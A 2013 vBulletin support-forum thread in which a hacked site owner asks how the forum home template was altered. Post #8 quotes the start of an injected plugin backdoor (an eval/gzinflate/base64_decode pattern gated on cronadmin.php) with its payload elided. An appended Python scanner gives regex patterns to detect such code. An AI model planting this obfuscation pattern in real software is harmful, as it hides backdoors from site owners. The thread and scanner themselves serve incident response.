  #1  
10-13-2013, 01:06 AM
VBUsers
Join Date: Aug 2004
Posts: 830
Hacker has changed my FORUMHOME template - how?

How has a hacker been able to change my forum home template to point to his forum? I reverted the template and fixed the issue but I don't know how he got in or what to change to stop him from doing this. Please help

hydrocanna.com

  #2  
10-13-2013, 01:10 AM
ozzy47
Join Date: Jul 2009
Location: USA
Posts: 10,929

You sure you cleaned out your site completely after you reported being hacked on Oct 4th?

  #3  
10-13-2013, 01:15 AM
VBUsers
Join Date: Aug 2004
Posts: 830

I removed all the plugins that I felt were out of date

I removed the install folder after upgrading to 4.2.2

I changed all admin pw and cpanel pw

What am I missing?

  #4  
10-13-2013, 01:20 AM
ozzy47
Join Date: Jul 2009
Location: USA
Posts: 10,929

Did you follow all the items in the following links thoroughly?

http://www.vbulletin.com/forum/blogs...ve-been-hacked

http://www.vbulletin.com/forum/blogs...vbulletin-site

  #5  
10-13-2013, 01:51 AM
VBUsers
Join Date: Aug 2004
Posts: 830

I have for the most part and I'm trying to go through the files that don't belong on my server but not sure if I should delete that many files. It's quite a few of them. Do I need to look at my plugins next?

How was he able to change the forum home? Are there that many entrances for him to use that we can't narrow it down?

Thank you so much for your help. I've been battling this for months now. It has def killed my community

  #6  
10-13-2013, 01:53 AM
Max Taxable
Join Date: Feb 2011
Posts: 3,134

Quote:
Originally Posted by VBUsers
I have for the most part and I'm trying to go through the files that don't belong on my server but not sure if I should delete that many files. It's quite a few of them. Do I need to look at my plugins next?

How was he able to change the forum home? Are there that many entrances for him to use that we can't narrow it down?

Thank you so much for your help. I've been battling this for months now. It has def killed my community

It's not only "narrowed down", it is explained explicitly, at the links provided.

  #7  
10-13-2013, 01:57 AM
ozzy47
Join Date: Jul 2009
Location: USA
Posts: 10,929

Well I would follow everything in the guides, and then you should be good to go.

There is no way of knowing exactly how the forumhome was changed, but at least reverting it seems to have fixed it.

If you have not got any emails from vb.org about a potential exploit in any mods you are using, then you should be safe. You will only get the email if you have mods you are using, marked as installed.

  #8  
10-13-2013, 02:05 AM
VBUsers
Join Date: Aug 2004
Posts: 830

I found that the hacker got into the admincp and edited a plugin that has this code in it

Code:
if (strpos($_SERVER['PHP_SELF'],'cronadmin.php')) { 

eval(gzinflate(base64_decode('...

The plugin has a lot more code that I can't post in here. Is this plugin the hack they keep getting in from? I deleted this a week ago. How is it back?

  #9  
10-13-2013, 02:07 AM
VBUsers
Join Date: Aug 2004
Posts: 830

Here is the screenshot from the log. How does he not have a username?

I blocked the IP but I'm sure that's not a big deal
Attached Images
File Type: jpg hacker.jpg (117.9 KB, 0 views)

  #10  
10-13-2013, 02:08 AM
CharlieDelta
Join Date: Apr 2010
Posts: 616

There is a hole somewhere. Could be a file hidden on your server. You need to thoroughly check every file and compare the dates, etc.
Make sure you follow the suggestions to a "T" that Ozzy linked.
Reply With Quote
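
A defender-side check for the pattern quoted in post #8, added here as an example and not part of any post in the thread: it flags `eval()` wrapped around decoder calls, and request-path checks like the `PHP_SELF` test, in plugin code exported to text or in files on disk. The function names, the suffix list and the sample strings are assumptions constructed for illustration; a request-path check alone is common in legitimate code and is reported only as context.

```python
import re
from pathlib import Path

# Decoder functions commonly chained inside eval() to hide injected PHP.
DECODERS = r"(?:gzinflate|gzuncompress|gzdecode|base64_decode|str_rot13)"
# eval( decoder( decoder( ... : the shape of the snippet quoted in post #8.
OBFUSCATED_EVAL = re.compile(
    r"\beval\s*\(\s*(?:@?\s*" + DECODERS + r"\s*\(\s*)+", re.I)
# Code gated on one request path, as the PHP_SELF comparison in post #8 is.
PATH_TRIGGER = re.compile(
    r"\$_SERVER\s*\[\s*['\"](?:PHP_SELF|REQUEST_URI|SCRIPT_NAME)['\"]\s*\]", re.I)

CHECKS = (
    (OBFUSCATED_EVAL, "eval of decoded data"),
    (PATH_TRIGGER, "request-path trigger"),
)

def scan_php(source):
    """Return sorted (line_number, finding) pairs for one blob of PHP text."""
    findings = []
    for pattern, label in CHECKS:
        for match in pattern.finditer(source):
            line = source.count("\n", 0, match.start()) + 1
            findings.append((line, label))
    return sorted(findings)

def scan_tree(root, suffixes=(".php", ".inc", ".xml")):
    """Scan files under root; return {relative_path: findings} for hits only."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = scan_php(path.read_text(errors="replace"))
            if found:
                hits[str(path.relative_to(root))] = found
    return hits

# Constructed sample: the two lines quoted in post #8, payload elided.
SAMPLE_PLUGIN = """if (strpos($_SERVER['PHP_SELF'],'cronadmin.php')) {

eval(gzinflate(base64_decode('...')));
}"""
CLEAN_PLUGIN = "$show['example'] = true;"  # constructed benign plugin code

if __name__ == "__main__":
    for line, finding in scan_php(SAMPLE_PLUGIN):
        print(f"line {line}: {finding}")
```

Any file or plugin reported with "eval of decoded data" should be compared against a clean copy from the original download before it is trusted again.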